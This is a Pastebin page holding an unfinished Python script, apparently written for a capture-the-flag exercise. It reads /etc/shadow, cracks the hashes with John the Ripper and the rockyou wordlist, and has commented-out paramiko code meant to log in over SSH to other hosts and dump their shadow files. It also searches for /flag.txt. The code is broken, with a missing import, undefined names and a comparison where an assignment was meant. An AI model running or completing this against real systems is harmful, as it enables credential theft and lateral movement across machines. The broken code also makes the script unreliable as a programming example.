API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 14th, 2019
129
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.04 KB | None | 0 0
raw download clone embed print report
  1. import os
  2. import subprocess
  3. import sys
  4. import threading
  5. import queue
  6.  
  7. import paramiko
  8.  
  9. if sys.version_info < (3, 0):
  10. print("Must be run with python3")
  11. exit()
  12.  
  13. ##### Globals
  14. COMPUTER = {}
  15. IP = {}
  16.  
  17. CRED = []
  18. CRACKABLE = []
  19.  
  20. Computer_Number = 0
  21.  
  22.  
  23. FLAG_FOUND = False
  24. Q = queue.Queue()
  25. COMPUTER[0] = {"reachable":[],
  26. "reached":[],
  27. "access":None,
  28. "credentials":None,
  29. "root":False
  30. }
  31.  
  32. ##### Helpers
  33.  
  34. class john(threading.Thread):
  35. def __init__(self):
  36. threading.Thread.__init__(self)
  37. global CRACKABLE
  38. global CRED
  39. def timeout(self):
  40. self.running = False
  41. def run(self):
  42. self.running = True
  43. while self.running:
  44. if len(CRACKABLE) != 0:
  45. file = CRACKABLE.pop()
  46. rip = subprocess.Popen(["john", "--wordlist=~/rockyou.txt", "--pot=./john.pot"], stdout=subprocess.PIPE)
  47. if rip.poll() == 0:
  48. (output, err) = subprocess.Popen(["john", "shadows/"+file, "--show", "--pot=./john.pot"], stdout=subprocess.PIPE).communicate()
  49. else:
  50. print("Error cracking %s" % file)
  51.  
  52. time.sleep(.25)
  53.  
  54. class cred(threading.Thread):
  55. def __init__(self):
  56. threading.Thread.__init__(self)
  57. global CRACKABLE
  58. global CRED
  59. def timeout(self):
  60. self.running = False
  61. def run(self):
  62. self.running = True
  63. num_creds = 0
  64. while self.running:
  65. if len(cred) == num_creds:
  66. time.sleep(.25)
  67. continue
  68. num_creds = len(cred)
  69. for Comp_Num in Computer.keys():
  70. if Computer[Comp_Num]["root"] == False and Computer[Comp_Num]["access"] != None:
  71. ssh_client =paramiko.SSHClient()
  72. ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  73. for username, password in Credentials:
  74. try:
  75. print("TODO")
  76. # ssh_client.connect(hostname=,username=username,password=password)
  77. # stdin,stdout,stderr=ssh_client.exec_command("cat /etc/shadow")
  78. # if stderr.readlines() == []:
  79. # Computer[Comp_Num]["root"] = True
  80. # load_shadow(stdin.read())
  81. # break
  82. except Exception as e:
  83. print(e)
  84.  
  85. def load_servers(fileContent):
  86. try:
  87. servers = []
  88. for line in fileContent.split("\n"):
  89. try:
  90. ip, port = line.split(":")
  91. servers.append([ip, port])
  92. except:
  93. pass
  94. return servers
  95. except Exception as e:
  96. print("Error parsing servers.txt:" + str(e))
  97.  
  98. def load_shadow(fileContent):
  99. load_shadow.filenumber
  100. try:
  101. with open('shadows/%d' % load_shadow.filenumber,'w+') as file:
  102. file.write(fileContent)
  103. CRACKABLE.append(load_shadow.filenumber)
  104. COMPUTER[0]["root"] = True
  105. except Exception as e:
  106. print("Error writing to directory: "+str(e))
  107. load_shadow.filenumber += 1
  108. load_shadow.filenumber = 0
  109.  
  110. # p = subprocess.Popen(["john", "--wordlist=~/rockyou.txt", "--pot=./john.pot"], stdout=subprocess.PIPE)
  111. ##### Start Main
  112. try:
  113. os.mkdir("shadows")
  114. except:
  115. pass
  116. #Get ips of host
  117. try:
  118. (output, err) = subprocess.Popen(["hostname --all-ip-addresses || hostname -I"], stdout=subprocess.PIPE, shell=True).communicate()
  119. for ip in output[:-2].decode('utf-8').split(" "):
  120. IP[ip] = 0
  121. except Exception as e:
  122. print("Error determining ip address: "+str(e))
  123. # ~/servers.txt
  124. with open("servers.txt") as file:
  125. COMPUTER[0]["reachable"] = load_servers(file.read())
  126. Q.put(0)
  127. # Attempt to read etc/shadow
  128. try:
  129. with open('/etc/shadow') as file:
  130. load_shadow(file.read())
  131. COMPUTER[0]["root"] == True
  132. except exception as e:
  133. print(e)
  134. pass
  135. print("Actually handle this case")
  136. try:
  137. with open('/flag.txt') as file:
  138. print("found flag")
  139. except:
  140. pass
  141.  
  142.  
  143. John_Thread = john()
  144. Cred_Thread = cred()
  145.  
  146. John_Thread.start()
  147. Cred_Thread.start()
  148.  
  149. Tunn_Threads = []
  150.  
  151. # while Q.qsize() != 0:
  152. # Computer = Computers(Q.pop())
  153. # for ip, port in Computer["reachable"]:
  154. # if ip in Computer["reached"]:
  155. # continue
  156. # for username, password in Credentials:
  157. # # Attempt log ins
  158. # Print("TODO")
  159. # # Create tunnel
  160. # if(len(Computer["reached"]) != len(Computer["reachable"])):
  161. # Q.put(Computer)
  162. # time.sleep(.25)
  163.  
  164. while len(CRED) == 0:
  165. time.sleep(.25)
  166.  
  167. John_Thread.timeout()
  168. Cred_Thread.timeout()
  169. for T in Tunn_Threads:
  170. print("TODO")
  171.  
  172. John_Thread.join()
  173. Cred_Thread.join()
  174. for T in Tunn_Threads:
  175. T.join()
  176.  
  177.  
  178. print(COMPUTER)
  179. print(IP)
  180.  
  181. print(CRED)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!